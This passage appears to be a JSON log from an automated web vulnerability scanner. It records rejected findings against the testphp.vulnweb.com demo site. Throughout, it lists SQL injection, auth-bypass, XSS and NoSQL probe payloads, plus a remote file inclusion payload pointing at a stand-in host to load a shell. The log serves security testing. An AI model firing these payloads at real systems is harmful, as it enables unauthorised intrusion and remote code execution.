PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php", "attempted_payloads": [ "{\"$gt\": \"\"}" ], "failure_reason": "Rejected nosql_injection in pic: no proof of execution; negative controls show same behavior (2/4 controls match) (score: 0/100)", "timestamp": 1771274341.857177 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "' OR '1'='1" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771341771.110322 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin'--" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771341773.665967 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin' #" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771341775.372823 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "' OR '1'='1" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771341777.516242 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin'--" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771341779.554067 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin' #" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771341782.0552142 }, { "vuln_type": "sqli_union", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php", "attempted_payloads": [ "' UNION SELECT NULL--" ], "failure_reason": "Rejected sqli_union in cat: negative controls show same behavior (1/4 controls match) (score: 30/100)", "timestamp": 1771341974.460635 }, { "vuln_type": "rfi", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php", "attempted_payloads": [ "http://evil.com/shell.txt" ], "failure_reason": "Rejected rfi in cat: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771341974.630286 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in cat: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771341974.648414 }, { "vuln_type": "rfi", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php", "attempted_payloads": [ "http://evil.com/shell.txt" ], "failure_reason": "Rejected rfi in artist: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771341976.383436 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in artist: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771341976.430634 }, { "vuln_type": "sqli_union", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php", "attempted_payloads": [ "' UNION SELECT NULL--" ], "failure_reason": "Rejected sqli_union in artist: negative controls show same behavior (1/4 controls match) (score: 30/100)", "timestamp": 1771341976.833942 }, { "vuln_type": "rfi", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php", "attempted_payloads": [ "http://evil.com/shell.txt" ], "failure_reason": "Rejected rfi in pic: no proof of execution; negative controls show same behavior (3/4 controls match) (score: 0/100)", "timestamp": 1771341978.229136 }, { "vuln_type": "sqli_union", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php", "attempted_payloads": [ "' UNION SELECT NULL--" ], "failure_reason": "Rejected sqli_union in pic: negative controls show same behavior (1/4 controls match) (score: 30/100)", "timestamp": 1771341978.6210911 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in pic: no proof of execution; negative controls show same behavior (2/4 controls match) (score: 0/100)", "timestamp": 1771341978.7290418 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/search.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in test: no proof of execution (score: 20/100)", "timestamp": 1771341982.6275818 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "' OR '1'='1" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771350161.2890959 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin'--" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771350162.877491 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin' #" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771350164.5030909 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "' OR '1'='1" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771350166.0852852 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin'--" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771350167.690537 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin' #" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771350169.338967 }, { "vuln_type": "xss_reflected", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "" ], "failure_reason": "Rejected xss_reflected in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771350270.906026 }, { "vuln_type": "xss_reflected", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "" ], "failure_reason": "Rejected xss_reflected in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771350272.7684531 }, { "vuln_type": "xss_reflected", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "" ], "failure_reason": "Rejected xss_reflected in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771350274.398189 }, { "vuln_type": "sqli_error", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "'" ], "failure_reason": "Rejected sqli_error in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771350275.95865 }, { "vuln_type": "sqli_error", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "\"" ], "failure_reason": "Rejected sqli_error in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771350277.603588 }, { "vuln_type": "sqli_error", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "' OR '1'='1" ], "failure_reason": "Rejected sqli_error in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771350279.299734 }, { "vuln_type": "sqli_blind", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "' AND 1=1--" ], "failure_reason": "Rejected sqli_blind in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771350280.943288 }, { "vuln_type": "sqli_blind", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "' AND 1=2--" ], "failure_reason": "Rejected sqli_blind in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771350282.678825 }, { "vuln_type": "sqli_blind", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "' AND 'a'='a" ], "failure_reason": "Rejected sqli_blind in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771350284.3346171 }, { "vuln_type": "sqli_union", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php", "attempted_payloads": [ "' UNION SELECT NULL--" ], "failure_reason": "Rejected sqli_union in artist: negative controls show same behavior (1/4 controls match) (score: 30/100)", "timestamp": 1771350351.254443 }, { "vuln_type": "rfi", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php", "attempted_payloads": [ "http://evil.com/shell.txt" ], "failure_reason": "Rejected rfi in artist: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771350351.459648 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in artist: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771350351.4791849 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/search.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in test: no proof of execution (score: 20/100)", "timestamp": 1771350353.3487082 }, { "vuln_type": "rfi", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php", "attempted_payloads": [ "http://evil.com/shell.txt" ], "failure_reason": "Rejected rfi in cat: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771350353.940165 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in cat: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771350355.108793 }, { "vuln_type": "rfi", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php", "attempted_payloads": [ "http://evil.com/shell.txt" ], "failure_reason": "Rejected rfi in pic: no proof of execution; negative controls show same behavior (3/4 controls match) (score: 0/100)", "timestamp": 1771350357.0708082 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in pic: no proof of execution; negative controls show same behavior (2/4 controls match) (score: 0/100)", "timestamp": 1771350357.2902038 }, { "vuln_type": "sqli_union", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php", "attempted_payloads": [ "' UNION SELECT NULL--" ], "failure_reason": "Rejected sqli_union in cat: negative controls show same behavior (1/4 controls match) (score: 30/100)", "timestamp": 1771350358.641603 }, { "vuln_type": "rfi", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php?cat=1", "attempted_payloads": [ "http://evil.com/shell.txt" ], "failure_reason": "Rejected rfi in searchFor: no proof of execution (score: 0/100)", "timestamp": 1771350359.583952 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php?cat=1", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in searchFor: no proof of execution (score: 20/100)", "timestamp": 1771350359.769726 }, { "vuln_type": "sqli_union", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php", "attempted_payloads": [ "' UNION SELECT NULL--" ], "failure_reason": "Rejected sqli_union in pic: negative controls show same behavior (1/4 controls match) (score: 30/100)", "timestamp": 1771350360.815899 }, { "vuln_type": "rfi", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php?cat=1", "attempted_payloads": [ "http://evil.com/shell.txt" ], "failure_reason": "Rejected rfi in goButton: no proof of execution (score: 0/100)", "timestamp": 1771350361.150208 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php?cat=1", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in goButton: no proof of execution (score: 20/100)", "timestamp": 1771350361.322602 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "' OR '1'='1" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771384311.7213812 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin'--" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771384313.298322 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin' #" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771384314.909744 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "' OR '1'='1" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771384316.476968 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin'--" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771384318.0317461 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin' #" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771384319.6290948 }, { "vuln_type": "xss_reflected", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "" ], "failure_reason": "Rejected xss_reflected in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771384411.85551 }, { "vuln_type": "xss_reflected", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "" ], "failure_reason": "Rejected xss_reflected in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771384413.589391 }, { "vuln_type": "xss_reflected", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "" ], "failure_reason": "Rejected xss_reflected in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771384415.891955 }, { "vuln_type": "sqli_error", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "'" ], "failure_reason": "Rejected sqli_error in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771384417.519396 }, { "vuln_type": "sqli_error", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "\"" ], "failure_reason": "Rejected sqli_error in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771384419.240395 }, { "vuln_type": "sqli_error", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "' OR '1'='1" ], "failure_reason": "Rejected sqli_error in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771384420.959083 }, { "vuln_type": "sqli_blind", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "' AND 1=1--" ], "failure_reason": "Rejected sqli_blind in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771384422.568177 }, { "vuln_type": "sqli_blind", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "' AND 1=2--" ], "failure_reason": "Rejected sqli_blind in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771384424.293283 }, { "vuln_type": "sqli_blind", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "' AND 'a'='a" ], "failure_reason": "Rejected sqli_blind in pic: negative controls show same behavior (2/4 controls match) (score: 30/100)", "timestamp": 1771384426.038038 }, { "vuln_type": "sqli_union", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php", "attempted_payloads": [ "' UNION SELECT NULL--" ], "failure_reason": "Rejected sqli_union in cat: negative controls show same behavior (1/4 controls match) (score: 30/100)", "timestamp": 1771384504.291442 }, { "vuln_type": "rfi", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php", "attempted_payloads": [ "http://evil.com/shell.txt" ], "failure_reason": "Rejected rfi in cat: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771384504.506165 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/listproducts.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in cat: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771384504.512715 }, { "vuln_type": "sqli_union", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php", "attempted_payloads": [ "' UNION SELECT NULL--" ], "failure_reason": "Rejected sqli_union in artist: negative controls show same behavior (1/4 controls match) (score: 30/100)", "timestamp": 1771384505.8537018 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in artist: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771384506.0897799 }, { "vuln_type": "rfi", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/artists.php", "attempted_payloads": [ "http://evil.com/shell.txt" ], "failure_reason": "Rejected rfi in artist: no proof of execution; negative controls show same behavior (1/4 controls match) (score: 0/100)", "timestamp": 1771384506.099565 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/search.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in test: no proof of execution (score: 20/100)", "timestamp": 1771384508.576139 }, { "vuln_type": "rfi", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php", "attempted_payloads": [ "http://evil.com/shell.txt" ], "failure_reason": "Rejected rfi in pic: no proof of execution; negative controls show same behavior (3/4 controls match) (score: 0/100)", "timestamp": 1771384510.708765 }, { "vuln_type": "sqli_time", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php", "attempted_payloads": [ "'; WAITFOR DELAY '0:0:5'--" ], "failure_reason": "Rejected sqli_time in pic: no proof of execution; negative controls show same behavior (2/4 controls match) (score: 0/100)", "timestamp": 1771384511.020888 }, { "vuln_type": "sqli_union", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php", "attempted_payloads": [ "' UNION SELECT NULL--" ], "failure_reason": "Rejected sqli_union in pic: negative controls show same behavior (1/4 controls match) (score: 30/100)", "timestamp": 1771384514.59153 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "' OR '1'='1" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771805652.685057 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin'--" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771805654.243371 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin' #" ], "failure_reason": "Rejected auth_bypass in id: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771805655.803651 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "' OR '1'='1" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771805657.371906 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin'--" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771805658.941612 }, { "vuln_type": "auth_bypass", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/admin", "attempted_payloads": [ "admin' #" ], "failure_reason": "Rejected auth_bypass in q: no proof of execution; negative controls show same behavior (4/4 controls match) (score: 0/100)", "timestamp": 1771805660.526166 }, { "vuln_type": "xss_reflected", "technology": "Server: nginx/1.19.0, PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1, PHP", "endpoint_pattern": "http://testphp.vulnweb.com/product.php?pic=1", "attempted_payloads": [ "" ], "failure_reason": "Rejected xss_reflected in 